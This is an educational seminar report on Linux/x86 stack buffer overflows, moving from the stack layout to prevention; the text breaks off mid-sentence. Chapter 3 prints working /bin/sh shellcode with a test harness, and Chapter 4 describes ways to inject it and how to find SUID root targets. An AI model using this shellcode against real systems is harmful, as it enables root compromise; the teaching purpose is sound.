buffer overﬂow attack - 123seminarsonly.com · 2012. 12. 20. · chapter 2. what’s a buffer...

Buffer Overflow Attack

Renjith Thomas

[email protected]

Buffer Overflow Attackby Renjith Thomas

Copyright © 2003 by Renjith Thomas

Revision History

Revision 1.0 15 Oct 2003 Revised by: RTBuffer Overflow Attack

Table of ContentsAcknowledgement ............................................................................... i1. Introduction ................................................................................... 1

Pre-requisites .....................................................................................1Linux File System Permissions ...........................................................1Linux and the C programming language .............................................2

2. What’s a Buffer Overflow? .............................................................. 3Memory layout ...................................................................................3

Text Segment..............................................................................3Data Segment .............................................................................3Stack Segment............................................................................3

EIP register, CALL & RET instructions................................................5ESP, EBP ...........................................................................................6An Illustration....................................................................................7A simple example ...............................................................................8

3. The Attack ................................................................................... 11Shell Code........................................................................................11How to execute /bin/sh ?.................................................................11

4. Creative stack smashing ............................................................... 17SUID root programs by distribution..................................................17

5. Prevention and Security ............................................................... 19Finding Buffer Overflows..................................................................19Stack Smashing Prevention ..............................................................19

Program modification................................................................19Compiler modifications .............................................................21CPU/OS kernel stack execution privilege ..................................22

6. Conclusion ................................................................................... 25A. References ................................................................................... 27

iii

Acknowledgement

This document was prepared to give an overview about buffer overflows. Ithink I’m able to render some of it in this document. I’m indebtedly gratefulto the Head Of The Computer Science Department Dr. Agnisarman Nambood-irifor his support. I’m grateful to Prof. Zainul Abidfor his valuable guidanceand suggestions. I’m also grateful to all other faculty members of ComputerScience Department for their support. I gracefully remeber all students of S7CSE-B.

i

Acknowledgement

ii

Chapter 1. Introduction

By combining the C programming language’s liberal approach to memoryhandling with specific Linux filesystem permissions, this operating systemcan be manipulated to grant unrestricted privilege to unprivileged accountsor users. A variety of exploit that relies upon these two factors is commonlyknown as a buffer overflow, or stack smashing vulnerability. Stack smashingplays an important role in high profile computer security incidents. In orderto secure modern Linux systems, it is necessary to understand why stacksmashing occurs and what one can do to prevent it.

Pre-requisitesTo understand what goes on, some C and assembly knowledge is required.Virtual Memory, some Operating Systems essentials, like, for example, how aprocess is laid out in memory will be helpful. You MUST know what a setuidbinary is, and of course you need to be able to -at least- use Linux systems.If you have an experince of gdb/cc, that is something really good. Documentis Linux/ix86 specific. The details differ depending on the Operating Systemor architecture you’re using.

Here, I have tried out some small buffer overflows that can be easily grasped.The pre-requisites described above are explained is some detail below.

Linux File System PermissionsIn order to better understand stack smashing vulnerabilities, it is first nec-essary to understand certain features of filesystem permissions in the Linuxoperating system. Privileges in the Linux operating system are invested solelyin the user root, sometimes called the superuser, root’s infallibility is ex-pected under every condition including program execution. The superuseris the main security weakness in the Linux operating system. Because thesuperuser can do anything, after a person gains superuser privileges for ex-ample, by learning the root password and logging in as root that person cando virtually anything to the system. This explains why most attackers whobreak into Linux systems try to become superusers.

Each program (process) started by the root user inherits the root user’sallinclusive privilege. In most cases the inherited privilege is subsequentlypassed to other programs spawned by root’s running processes. Set UID(SUID) permissions in the Linux operating system grant a user privilege torun programs or shell scripts as another user.

Linux operating system, the process in memory that handles the programexecution is usually owned by the user who executed the program. Using aunique permission bit to indicate SUID, the filesystem indicates to the op-erating system that the program will run under the file owner’s ID ratherthan the user’s ID who executed the program. Often times SUID programsare owned by root; while these programs may be executable by an under-privileged user on the system, they run in memory with unrestricted accessto the system. As one can see, SUID root permissions are used to grant anunprivileged user temporary, and necessary, use of privileged resources.

Many Linux programs need to run with superuser privileges. These pro-grams are run as SUID root programs, when the system boots, or as networkservers. A single bug in any of these complicated programs can compromisethe safety of your entire system. This characteristic is probably a design flaw,but it is basic to the design of Linux, and it not likely to change. Exploitationof this “feature turned design flaw” is critical in constructing buffer overflowexploits.

1

Chapter 1. Introduction

Linux and the C programming languageThe Linux operating system is inextricably linked to the C programming lan-guage. All modern implementations of the Linux operating system are writtenin the C programming language, including system binaries and the kernel.What C gains in simplicity and efficiency, it sacrifices in terms of data in-tegrity and ease of use. The standard C library in most Linux implementa-tions is vulnerable to buffer overflows and memory leaks. Not to be inter-preted as errors in the design of the language, C assumes the programmeris responsible for data integrity.

Once a variable is allocated memory space in C, the language does noth-ing to insure that the expected contents of the variable fit into the allocatedmemory. C programmers often use the term buffer and array interchange-ably thus, it is safe to define a buffer as a contiguous block of memory (core)that holds multiple instances of an identical data type.

As with all variables in C, buffers are declared dynamic or static. Staticbuffers which are explicitly defined in the source code and are allocated atload time on the data segment in memory. Dynamic arrays are defined viapointers to memory locations in source code and are allocated at run timeon the stack. Due to the obvious limitations on static arrays, dynamic al-location is the method used in all major programs and applications in theLinux environment. Thus, Smashing the stack or stack overflow exploits areconcerned only with programs that do dynamic allocation.

2

Chapter 2. What’s a Buffer Overflow?

Memory layoutIf you know C, you - most probably - know what a character array is. As-suming that you code in C, you should already know the basic propertiesof arrays, like: arrays hold objects of similar type, e.g. int, char, float. Justlike all other data structures, they can be classified as either being "static" orbeing "dynamic". Static variables are loaded to the data segment part of theprogram, whereas dynamic variables are allocated and deallocated withinthe stack region of the executable in the memory. And, "stack-based" bufferoverflows occur here, we stuff more data than a data structure, say an array,can hold, we exceed the boundaries of the array overriding many importantdata. Simply, it is copying 20 bytes to an array that can handle only 12bytes...

Memory layout for a Linux ELF binary is quite complex. It has become evenmore complex, especially after ELF ("Executable and Linkable Format") andshared libraries are introduced. However, basically, every process starts run-ning with 3 segments:

Text Segment

Text Segment, is a read-only part that includes all the program instructions.For such assembly instructions that are the equivalent of the below C codewill be included in this segment:

for (i = 0; i < 10; i++)s += i;

Data Segment

Data Segment is the block where initialized and uninitialized (which is alsoknown as BSS) data is. For example,if you code:

int i;

the variable is an uninitialized variable, and it’ll be stored in the "uninitializedvariables" part of the Data Segment. (BSS) and, if you code;

int j = 5;

the variable is an initialized variable, and the the space for the j variable willbe allocated in the "initialized variables" part of the Data Segment.

Stack Segment

A segment, which is called "Stack", where dynamic variables (or in C jar-gon, automatic variables) are allocated and deallocated; and here return ad-dresses for functions are stored temporarily. For example, in the followingcode snippet, i variable is created in the stack, just after the function re-turns, it is destroyed:

int myfunc(void){

int i;

for (i = 0; i < 10; i++)

3


putchar("*");putchar(’\n’);

}

If we are to symbolize the stack:

0xBFFFFFFF ---------------------| || . || . || . || . || etc || env/argv pointer. || argc ||-------------------|| || stack || || | || | || V |/ /\ \| || ^ || | || | || || heap ||-------------------|| bss ||-------------------|| initialized data ||-------------------|| text ||-------------------|| shared libraries || etc. |

0x8000000 |-------------------|

_* STACK *_

Stack is in basic terms a data structure, which all of you will remember fromyour Data Structures courses. It has the same basic operation. It’s a LIFO(Last-In, First Out) data data structure. Its processes are controlled directlyby the CPU via some special instructions like PUSH and POP. You PUSHsome data to the Stack, and POP some other data. Whoever comes in LAST,he’s the one who will go out FIRST. So, in technical terms, the first that willbe popped from the stack is the one that is pushed last.

SP (Stack Pointer) register on the CPU contains the address of data that willbe popped from the stack. Whether SP points to the last data or the one afterthe last data on the stack is CPU-specific; however, ix86 architecture, whichis our subject, SP points to the address of the last data on the Stack. In ix86protected mode (32 bit/double word),PUSH and POP instructions are done in4-byte-units. Another important detail to be noted here is that Stack growsdownward, that is, if SP is 0xFF, just after PUSH EAX instruction, SP willbecome 0xFC and the value of EAX will be placed on 0xFC address.

4


PUSH instruction will subtract 4 bytes from ESP (remember the above para-graph), and will push a double word to the stack, placing the double wordinthe address pointed by the ESP register. POP instruction, on the other hand,reads the address in the ESP register, POPs the value pointed by that ad-dress from the Stack, and adds 4 to ESP (adds 4 to the address in the ESPregister). Assuming that ESP is initially 0x1000, let’s examine the followingassembly code:

PUSH dword1;value at dword1:1, ESP’s value: 0xFFC (0x1000-4)PUSH dword2;value at dword2: 2, ESP’s value: 0xFF8 (0xFFC-4)PUSH dword3;value at dword3: 3, ESP’s value: 0xFF4 (0xFF8-4)POP EAX;EAX’ value 3, ESP’s value: 0xFF8 (0xFF4+4)POP EBX;EBX’s value 2, ESP’s value: 0xFFC (0xFF8+4)POP ECX;ECX’s value 1, ESP’s value: 0x1000 (0xFFC+4)

Stack, while being used as a temporay storage for dynamic variables, it’sbeing used to store the return addresses for some fuction calls storing tem-porary variables and for passing parameters to fuctions. And, of course, thisis where evil things come into ground.

EIP register, CALL & RET instructionsCPU, in each machine cycle, looks at what’s stored in the Instruction Pointerregister (In ix86 32-bit protected mode this is EIP - Extended InstructionPointer) to know what to execute next. In the EIP register, the address of theinstruction that will be executed next is stored. Usually, the addresses aresequential, meaning the next instruction that’ll be executed next is, a fewbytes ahead of the current instruction in the memory. The CPU calculatesthat "a few bytes" according to how many bytes long the current instructionis; and adds that "a few bytes" value to the address of the present address.To examplify, assume that the present instruction’s address is 0x8048438.This is the value that’s written in EIP. So, CPU is executing the instructionthat’s found in memory location: 0x8048438. Say, it’s a PUSH instruction:

push %ebp

CPU knows that a PUSH instruction is 1 byte long, so the next instructionwill be at 0x8048439, which may be

mov %esp,%ebp

While executing the PUSH, CPU will put the address of MOV in EIP.

Okay, we said that the values that’ll be put in EIP are calculated by the CPUitself. What if we JMP to a function? The addresses of the instructions in thefunction will be somewhere else in the memory. After they are executed, howcan the CPU know where to go on with the calling procedure and execute.For this, just before we JMP to the function, we save the address of the nextinstruction in a temporary register, say in EDX; and before returning fromthe function we write the address in EDX to EIP back again. If we use JMPto jump to the addresses of functions, that would be a very tiresome workactually.

5


However, ix86 processor family provides us with two instructions: CALL andRET, making our lives easy! the CALL instruction writes that "next instruc-tion to be executed after function returns" (from then on, we’ll call this asthe "return address") to the stack. It PUSHes it onto the stack, and writesthe address of the function to EIP. Thus, a function call is made. The RET in-struction, on the other hand, POPs the "return address" from the stack, andwrites that address in the EIP. Thus we’ll safely return from the function,and continue with the program’s next thread of execution.

Let’s have a look at the following code snippet:

x = 0;function(1, 2, 3);x = 1;

After several assembly instructions has been run for (x = 0), we need to gothe memory location where function() is located. As we said earlier, for this tohappen, first we copy the address of the return address, (the address of x = 1instructions in this case.) to some temporary space (might be a register) jumpto the address space of function with JMP, and, in the end of the functionwe restore the return address that we’d copied to the EIP.

All these dirty operations are done on behalf of us via CALL and RET by theCPU itself, and you can get the details from the above paragraph. Generally,the Stack region of the program can be symbolized like:

|_parameter_I____| ESP+8|_parameter II___| ESP+4|_return address_| ESP

ESP, EBPThe stack, as we’ve said, is also used to store dynamic variables. Dynam-ically, the CPU PUSHes some data, as the program requests new space,and POPs other data, when our program releases some data. To addressthe memory locations, we use "relative addressing". That means, we addressthe locations of data in our stack in relative to some criterion. And this crite-rion is ESP, which is the acronym for Extended Stack Pointer. This registerpoints to the top of the stack. Consider this:

void f(){

int a;}

As you can see, in the f() function, we allocate space for an integer variablenamed a . The space for the integer variable a will be allocated in the stack.And, the computer will referece its address as ESP - some bytes. So the stackpointer is quite crucial for the program execution. What if we call a function?The calling function has a stack, it has some local variables, meaning itshould utilize the stack pointer register. Also, the function that is called fromwhithin will have local variables and it’ll need that stack pointer.

To overcome this, we save the old stack pointer. We, just like we did for thereturn address, PUSH the old ESP to the stack, and utilize another register,named EBP to relatively reference local variables in the callee function.

6


And, this is the symbolization of the Stack, if ESP is also PUSHed onto thestack:

|_parametre_I___| EBP+12|_parametre II__| EBP+8|_return adress_| EBP+4|___saved_ESP___| EBP ESP|_local var I __| EBP-4|_local var II__| EBP-8

In the above picture, parameter I and II are the arguments passed to thefunction. After the return address and saved ESP, local var I and II are thelocal variables of the function. Now, if we sum up all we said, while calling afunction:

• 1. We save the old stack pointer, PUSHing it onto the stack

• 2. We save the address of the next instruction (return address), PUSHingit onto the stack.

• 3. And we start executing the instructions of the function.

These 3 steps are all done when we CALL a subroutine, say a function.

An IllustrationLet’s see the operation of the stack, and procedure prologue in a live example:

void fun(int a, int b, int c){

char z[4];}

void main(){

fun(1, 2, 3);}

compile this with the -g flag to enable debugging: $ gcc -g a.c -o a

Let’s see the what’s happened there: $ gdb -q ./a (gdb) disassemble main

Dump of assembler code for function main:

0x8048448 <main>: pushl %ebp0x8048449 <main+1>: movl %esp,%ebp0x804844b <main+3>: pushl $0x30x804844d <main+5>: pushl $0x20x804844f <main+7>: pushl $0x10x8048451 <main+9>: call 0x8048440 <fun>0x8048456 <main+14>: addl $0xc,%esp0x8048459 <main+17>: leave0x804845a <main+18>: retEnd of assembler dump.(gdb)

As you can see above, in main() the first instruction is:

0x8048448 <main>: pushl %ebp

which backs up the old stack pointer. It pushes it onto the stack.

7


Then, copy the old stack pointer to the ebp register:

0x8048449 <main+1>: movl %esp,%ebp

Thus, from then on, in the function, we’ll reference function’s local variableswith EBP. These two instructions are called the "Procedure Prologue".

Then, we PUSH the function fun()’s arguments onto the stack in reverseorder:

0x804844b <main+3>: pushl $0x30x804844d <main+5>: pushl $0x20x804844f <main+7>: pushl $0x1

We call the function:

0x8048451 <main+9>: call 0x8048440 <fun>

As I’ve explained by CALL’ing we PUSHed the address of instructionaddl $0xc,%esp’s address 0x8048456 onto the stack. After the functionRETurned, we add 12 or 0xc in hex (since we pushed 3 args onto the stack,each allocating 4 bytes (integers)).

Then we leave the main() function, and return:

0x8048459 <main+17>: leave0x804845a <main+18>: ret

Ok, what happened inside the function fun() ?:

(gdb) disassemble funDump of assembler code for function fun:0x8048440 <fun>: pushl %ebp0x8048441 <fun+1>: movl %esp,%ebp0x8048443 <fun+3>: subl $0x4,%esp0x8048446 <fun+6>: leave0x8048447 <fun+7>: retEnd of assembler dump.(gdb)

The first two instructions are just the same. They are procedure prologue.Then we see a :

0x8048443 <fun+3>: subl $0x4,%esp

which subtracts 4 bytes from ESP. This is to allocate space for the localz variable. We declared it as char z[4] remember? It is a 4-byte characterarray. End, at the end, the function returns:

0x8048446 <fun+6>: leave0x8048447 <fun+7>: ret

8


A simple example

#include <string.h>

void fun(char *str){

char foo[16];

strcpy(foo, str);}

void main(){

char large_one[256];

memset(large_one, ’A’, 255);fun(large_one);

}

$ cc -W -Wall -pedantic -g c.c -o c$ ./cSegmentation fault (core dumped)

What we do above is simply writing 255 bytes to an array that can hold only16 bytes. We passed a large array of 256 bytes as a parameter to the fun()function. Within the function, without bounds checking we copied the wholelarge_one to the foo, overflowing all the way foo and some other data. Thusbuffer is filled, also strcpy() filled other portions of memory, including thereturn address, with A.

Here is the inspection of generated core file with gdb:

$ gdb -q c coreCore was generated by ‘./c’.Program terminated with signal 11, Segmentation fault.find_solib: Can’t read pathname for load map: Input/output error

#0 0x41414141 in ?? ()(gdb)

As you can see, CPU saw 0x41414141 (0x41 is the hex ASCII code for letterA) in EIP, tried to access and execute the instruction located there. However,0x41414141 was not memory address that our program was allowed to ac-cess. In the end, OS send a SIGSEGV (Segmentation Violation) signal to theprogram and stopped any further execution. When we called f(), the stacklooked like this:

|______*str______| EBP+8|_return address_| EBP+4|___saved_ESP____| EBP ESP|______foo1______| EBP-4|______foo1______| EBP-8|______foo1______| EBP-12|______foo1______| EBP-16

strcpy() copied large_one to foo, without bounds checking, filling the wholestack with A, starting from the beginning of foo1, EBP-16. Now that we couldoverwrite the return address, if we put the address of some other memorysegment, can we execute the instructions there? The answer is yes.

9


Assume that we place some /bin/sh spawning instructions on some memoryaddress, and we put that address on the function’s return address that weoverflow, we can spawn a shell, and most probably, we will spawn a rootshell, since you’ll be already interested with setuid binaries.

10

Chapter 3. The Attack

Shell CodeAs shown in the previous section, by manipulating dynamically allocatedvariables with unbounded byte copy operations, execution of arbitrary codeis possible via the return address blindly ‘restored’ following a function exit.The ability to execute arbitrary code instructions as the superuser is oftenused with calls that will allow an attacker to continue executing indefinitecommands as root.

To obtain maximum root system privilege, the interactive bourne shell pro-gram is spawned, /bin/sh. The bourne shell is a shell that exists on everymodern UNIX system, and is commonly the default system shell for the priv-ileged user. Any system shell can be used as shell code, however, in theinterest of keeping this study as generic as possible, /bin/sh is assumed.

In order to arrange an interactive shell situation, a static /bin/sh executionsequence must appear somewhere in memory so that a manipulated ‘returnaddress’ can point to that location. This is accomplished by using an assem-bly language hexadecimal string of the binary equivalent to the standard Cfunction call: execve(name[0], "/bin/sh", NULL). Assembly language equiva-lents to this call are hardware implementation dependent . Using debuggingutilities, it is possible to dissect a call such as execve(name[0], "/bin/sh",NULL) by breaking it down to a simple ASCII assembly sequence, and stor-ing it in a character array or other contiguous data structure. On an Intel x86machine running Linux, the following is a list of steps used in formulatingshell:

• 1. The null terminated string /bin/sh exists somewhere in memory.

• 2. The address of the string /bin/sh exists somewhere in memory followedby a null long word.

• 3. 0xb is copied into the EAX register.

• 4. The address of the string /bin/sh is copied into the EBX register.

• 5. The address of the string /bin/sh is copied into the ECX register.

• 6. The address of the null long word is copied into the EDX register.

• 7. The int $0x80 instruction is executed, a standard Intel CPU interrupt

• 8. 0x1 is copied into the EAX register.

• 9. 0x0 is copied into the EBX register.

• 10. The int $0x80 instruction is executed, a standard Intel CPU interrupt.

This listing can be reduced to x86 actual shell code in a standard ANSI Ccharacter array.

How to execute /bin/sh ?In C, the code to spawn a shell would be like this:

#include <unistd.h>

void main(){

char *shell[2];

shell[0] = "/bin/sh";shell[1] = NULL;

11


execve(shell[0], shell, NULL);}

$ cc -W -Wall -pedantic -g shell.c -o shell$ ./shellbash$

If you look at the man page of execve , you’ll see that execve expects a pointerto the filename that’ll be executed, a NULL terminated array of arguments,and an environment pointer, which can be NULL. If you compile and run theoutput binary, you’ll see that you spawn a new shell.

So far so good... But we cannot spawn a shell in this way, right? How can wesend this code to the vulnerable program this way? We can’t! This poses usa new question: How can we pass our evil code to the vulnerable program?We will need to pass our code, which will possibly be a shell code, in thevulnerable buffer. For this to happen, we have to be able to represent ourshell code in a string.

Thus we’ll list all the assembly instructions to spawn a shell, get their op-codes, list them one by one, and assemble them as a shell spawning string.First, let’s see how the above code will be in assembly. Let’s compile the pro-gram as static (this way, also execve system call will be disassmbled) andsee:

$ gcc -static -g -o shell shell.c$ objdump -d shell | grep \ <__execve\>: -A 120804ca10 <__execve>:

804ca10: 53 pushl %ebx804ca11: 8b 54 24 10 movl 0x10(%esp,1),%edx804ca15: 8b 4c 24 0c movl 0xc(%esp,1),%ecx804ca19: 8b 5c 24 08 movl 0x8(%esp,1),%ebx804ca1d: b8 0b 00 00 00 movl $0xb,%eax804ca22: cd 80 int $0x80804ca24: 5b popl %ebx804ca25: 3d 01 f0 ff ff cmpl $0xfffff001,%eax804ca2a: 0f 83 00 02 00 jae 804cc30 <__syscall_error>804ca2f: 00804ca30: c3 ret804ca31: 90 nop

Let’s analyze the syscall step by step: Remember, in our main() function, wecoded:

execve(shell[0], shell, NULL)

We passed: the address of string "/bin/sh", the address of NULL terminatedarray, NULL (in fact it is env address).

Here in the main:

$ objdump -d shell | grep \ <main\>: -A 1708048124 <main>:8048124: 55 pushl %ebp8048125: 89 e5 movl %esp,%ebp8048127: 83 ec 08 subl $0x8,%esp804812a: c7 45 f8 ac 92 movl $0x80592ac,0xfffffff8(%ebp)804812f: 05 088048131: c7 45 fc 00 00 movl $0x0,0xfffffffc(%ebp)

12


8048136: 00 008048138: 6a 00 pushl $0x0804813a: 8d 45 f8 leal 0xfffffff8(%ebp),%eax804813d: 50 pushl %eax804813e: 8b 45 f8 movl 0xfffffff8(%ebp),%eax8048141: 50 pushl %eax8048142: e8 c9 48 00 00 call 804ca10 <__execve>8048147: 83 c4 0c addl $0xc,%esp804814a: c9 leave804814b: c3 ret804814c: 90 nop

before the call execve (call 804ca10 <__execve>), we pushed the argumentsonto the stack in reverse order. So, if we turn back to __execve:

We copy the NULL byte to the EDX register, we copy the addresss of the NULLterminated array into ECX register, we copy the address of string "/bin/sh"into the EBX register, we copy the syscall index for execve, which is 11 (0xb)to EAX register.Then change into kernel mode.

All what we need is this much. However, there are problems here. We can-not exactly know the addresses of the NULL terminated array’s and string"/bin/sh"’s addresses. So, how about this?:

xorl %eax, %eaxpushl %eaxpushl $0x68732f2fpushl $0x6e69622fmovl %esp,%ebxpushl %eaxpushl %ebxmovl %esp,%ecxcdqlmovb $0x0b,%alint $0x80

Let’s try to explain the above instructions: If you xor something with itself,you get 0, equivelant of NULL. Here, we get a NULL in EAX register.Then wepush the NULL onto stack. We push string "//sh" onto the stack,

2f is /2f is /73 is s68 is h

pushl $0x68732f2f

We push string "/bin" onto the stack:

2f is /62 is b69 is i6e is npushl $0x6e69622f

As you can guess, now the stack pointer’s address is just like the address ofour NULL terminated string "/bin/sh"’s address. Because, starting from thestack pointer which points to the top of the stack, we have a NULL terminatedcharacter array. So, we copy the stack pointer to EBX register. See, we havealready placed "/bin/sh"’s address into EBX register :

movl %esp,%ebx

13


Then we need to set ECX with the NULL terminated array’s address. To dothis, We create a NULL-terminated array in our stack, very similar to theabove one: First we PUSH a NULL. we can’t do PUSH NULL, but we canPUSH something which is NULL, remember that we xor’d EAX register andwe have NULL there, so let’s PUSH EAX to get a NULL in the stack:

pushl %eax

Then we PUSH the address of our string onto stack, this is the equivelant ofshell[0]:

pushl %ebx

Now that we have a NULL terminated array of pointers, we can save its ad-dress in ECX:

movl %esp,%ecx

What else do we need? A NULL in EDX register. we can movl %eax, %edx,but we can do this operation with a shorter instruction: cdq. This instructionsign-extends what’s in EAX to EDX. :

cdql

We set EAX 0xb which is the syscall id of execve in system calls table.

movb $0x0b,%al

Then, we change into kernel mode:

int 0x80

After, we go into kernel mode, the kernel will exec what we instructed it:/bin/sh and we will enter an interactive shell...

So, after this much philosophy, all what we need is to convert these asminstructions into a string. So, let’s get the hexadecimal opcodes and assembleour evil code. Here we put our evil code in the chracter array sc[]. Let’s testour shell code:

char sc[]= /* 24 bytes */"\x31\xc0" /* xorl %eax,%eax */"\x50" /* pushl %eax */"\x68""//sh" /* pushl $0x68732f2f */"\x68""/bin" /* pushl $0x6e69622f */"\x89\xe3" /* movl %esp,%ebx */"\x50" /* pushl %eax */"\x53" /* pushl %ebx */"\x89\xe1" /* movl %esp,%ecx */"\x99" /* cdql */"\xb0\x0b" /* movb $0x0b,%al */"\xcd\x80" /* int $0x80 */

;

main(){

int *ret;

ret = (int *)&ret + 2;*ret = sc;

}

14


$ gcc -g -o shellcode shellcode.c$ ./shellcodebash$

Hmm, it works.

What we’ve done above is, increasing the address of ret (which is a pointer tointeger) 2 double words (8 bytes), thus reaching the memory location wherethe main()’s return address is stored. And then, because ret’s relative ad-dress is now RET, we stored the address of string sc’s address (which is ourevil code) into ret. In fact, we changed the return address’ value there. Thereturn address then pointed to sc[]. When main() issued RET, the sc’s ad-dress has been written to EIP, and consequently, the CPU started executingthe instructions there, resulting in the execution of /bin/sh.

15


16

Chapter 4. Creative stack smashing

SUID root programs included in Linux distributions are not precompiled with“shell code” as part of the binary. To exploit these type of programs, somemeans must be used to insert the shellcode array into the runtime envi-ronment. Stack smashers have devised creative ways to accomplish this. Inorder to inject the shell code into the runtime process, stack smashers havemanipulated command line arguments, shell environment variables, and in-teractive input functions with the necessary shell code sequence.

Not only do most stack smashing exploits rely upon shell code to accomplishtheir task, but these type of exploits depend on knowing at what addressin memory this shell code will reside. Taking this into consideration, manystack smashers have padded their shell code with NULL (or noop) assemblyoperations this gives the shell code a ‘wider space’ in memory and makesit easier to guess where the shell code may be when manipulating the re-turn address. This approach, combined with an approach whereby the shellcode is followed by many instances of the ‘guessed’ return address in mem-ory; is a common strategy used in constructing stack smashing exploits. Anadditional approach, when small programs with memory restrictions are ex-ploited, is to store the shellcode in an environment variable.

SUID root programs by distributionIn order to search standard Linux distributions for SUID root programs, thefollowing command can be executed by the privileged user: /usr/bin/find /user root perm 004000 print

This command is a systemwide search command for SUID root files; which,as described, are crucial in constructing stack smashing exploits. On a Linuxmachine running the 2.0.30 kernel, built from a modified version of theSlackware distribution, 56 SUID root worldexecutable binaries existed on thesystem. A subtle byte copying error in any one of the above programs couldallow for a stack smashing vulnerability. Comparatively, in a distribution ofthe Solaris operating system, approximately 67 SUID root worldexecutableprograms on the system in total 12. As with the Linux distribution, an errorin the coding to handle dynamic string variables in any one of these systembinaries could allow for a stack smashing vulnerability. Using Linux and So-laris as examples, one may conclude that a significant number of SUID rootbinaries exist in the typical Linux distribution. Any one of these programscan become a target for stack smashers, thus, prevention and protection ofthese files is a necessity.

17

Chapter 4. Creative stack smashing

18

Chapter 5. Prevention and Security

Finding Buffer OverflowsAs stated earlier, buffer overflows are the result of stuffing more informationinto a buffer than it is meant to hold. Since C does not have any built-inbounds checking, overflows often manifest themselves as writing past theend of a character array. The standard C library provides a number of func-tions for copying or appending strings, that perform no boundary checking.

They include: strcat(), strcpy(), sprintf(), and vsprintf(). These functions oper-ate on null-terminated strings, and do not check for overflow of the receivingstring. gets() is a function that reads a line from stdin into a buffer untileither a terminating newline or EOF. It performs no checks for buffer over-flows. The scanf() family of functions can also be a problem if you are match-ing a sequence of non-white-space characters (%s), or matching a non-emptysequence of characters from a specified set (%[]), and the array pointed to bythe char pointer, is not large enough to accept the whole sequence of char-acters, and you have not defined the optional maximum field width.

If the target of any of these functions is a buffer of static size, and its otherargument was somehow derived from user input there is a good posibilitythat you might be able to exploit a buffer overflow. Another usual program-ming construct we find is the use of a while loop to read one character at atime into a buffer from stdin or some file until the end of line, end of file, orsome other delimiter is reached. This type of construct usually uses one ofthese functions: getc(), fgetc(), or getchar(). If there is no explicit checks foroverflows in the while loop, such programs are easily exploited.

To conclude, grep() is your friend. The sources for free operating systems andtheir utilities is readily available. This fact becomes quite interesting onceyou realize that many comercial operating systems utilities where derivedfrom the same sources as the free ones.

Stack Smashing PreventionA centralized or decentralized approach can be taken to avoid stack smash-ing security vulnerabilities. To do so, changes must be implemented in theprivileged programs themselves, in the C programming language compilers,or in the operating system kernel. A centralized approach involves modifi-cation of system libraries and/or an operating system kernel while a decen-tralized approach involves the modification of privileged programs and/or Cprogramming language compilers. Of these two basic approaches, a decen-tralized approach is more immediately expensive with respect to manpowerand workload, but cheaper in the long term providing a stable, long lastingsolution. A centralized approach is cheaper in the short term, with respectto manpower and workload, but is near impossible to implement as a longterm solution.

Program modification

To effectively fix defective SUID root program, a number of modifications canbe made to the program’s source code to avoid stack smashing vulnerabil-ities. Standard C byte copy or concatenation functions often are crucial inmost buffer overflow exploits. A list of vulnerable function calls in the C pro-gramming language, and suitable replacement function (if available) is asfollows:

function suitable replacement

19


gets() fgets()sprintf()strcat() strncat()strcpy() strncpy()streadd()strecpy()strtrns()index()fscanf()scanf()sscanf()vsprintf()realpath()getopt()getpass()

In general, functions that return a pointer to a result in static storage can beused in stack smashing exploits. In other terms, standard C function callsthat copy strings without checking their length are insecure. Some vulnera-ble functions have suitable ‘drop in’ replacements, others do not. Wheneverpossible, alternative functions must be used to help insure that privilegedcode is not susceptible to stack smashing exploits. In addition to using suit-able replacements for vulnerable functions, shell environment pointers andexcessive command line arguments also need to be checked for invalid data.Recall that stack smashers are creative and often hide shell code and othercrucial exploit information in excessive command line arguments or environ-ment variables.

Thus, securing source code must be a comprehensive process to be effec-tive, and all avenues of unauthorized input must be inspected and properlyterminated if invalid.

Commercial programs such as CenterLine software’s Code Center or PureAtria’s Purify, and noncommercial programs such as Brian Marick’s GCT orBruce Peren’s ElectricFence can be used to assist programmers in locatingbuffer overflows and illegal function operations that standard C compilersdo not look for. However, programs such as these can only catch overflowbugs reactively, not proactively; A test case must exist which provokes thestack smashing hole. Furthermore, many of these programs can offer moreinformation than standard Linux facilities while investigating a program’sabnormal memory operations.

As C debugging tools, these programs may offer more than simple ‘segmen-tation violation’ messages. However, it is important to remember that theseprograms are designed to remove bugs and do not specialize in security. Fur-thermore, these programs do not consider the current or future filesystempermissions of the program. The same battery of tests are submitted to aprogram whether it runs as a privileged user or not.

In summary, automated debugging tools are useful in correcting known vul-nerabilities, however, they cannot detect future vulnerabilities and are lim-ited as security tools. Security and stability are synonymous. Programs thatuse secure functions and accept less bad input data are not only more se-cure, but run more efficiently and build faster. By changing existing codeand writing new code with security in mind, both privileged code and non-privileged code share the benefits. Recalling the ease in which privileged pro-gram execution can be transferred, it is important to note that privilegedcode often trusts non privileged code. Privileged processes may assume thatall binaries, privileged and non privileged, are to be trusted.

By using more secure programming practices on all Linux system code, everysegment of the code base is strengthened. Security and robustness both

20


involve thinking about the ranges of allowable inputs and responses, andlimiting them so undesirable responses are not produced.

Modifying the code is the only near foolproof method of insuring that SUIDroot programs are not exploited. Not only can this avoid buffer overflows inprograms, but it will build faster, more efficient, robust code with respect tononsecurity areas of the operating system. The OpenBSD project has paidspecial attention to this.

The disadvantages of manually modifying all affected programs is obvioussince all subject programs must be checked by hand and recompiled. Thou-sands of lines of source code must have all function calls and UID executionprivileges examined and changed, if necessary. In the free operating systemarena, systems such as Linux, FreeBSD, OpenBSD and NetBSD have fullsource code distributions available for public use. Complete copies of the op-erating system kernel and system utilities may be downloaded and modified,allowing anyone to fix stack smashing vulnerabilities.

However, In contrast to this approach, commercial Linux operating systemshave limited, if any source code availability. As the chief decentralized ap-proach in avoiding stack smashing holes in the Linux operating system,global code auditing is the most expensive in terms of necessary manpowerand workload but can offer the most in long term reliability and security.

Compiler modifications

An additional decentralized approach to preventing stack smashing vulner-abilities is to modify the C language compiler’s performance in a given Linuxoperating system concerning vulnerable functions. However, it is importantto note that, in most cases, these modifications to the C programming lan-guage are not trivial and involve fundamental modifications to the conceptsbehind the C programming language.

A simple approach of this nature involves modifications to the C compiler,which do not affect the C programming language. For example, the BSDI andOpenBSD operating systems’ compilers generate warning messages whencompiling a program which uses “dangerous” function calls. Despite thisshortcoming, the main benefit of using an approach such as this is that itencourages secure programming without changing the code or its perfor-mance.

A median approach of this nature involves slight modifications to the com-piler, such as those would modify only the “dangerous” functions in the Clibrary and perform a stack integrity check before referencing the appropri-ate return value. In his proposed patch to the FreeBSD operating system, ifthe integrity check fails, it would simply print a warning message and exitthe affected program.

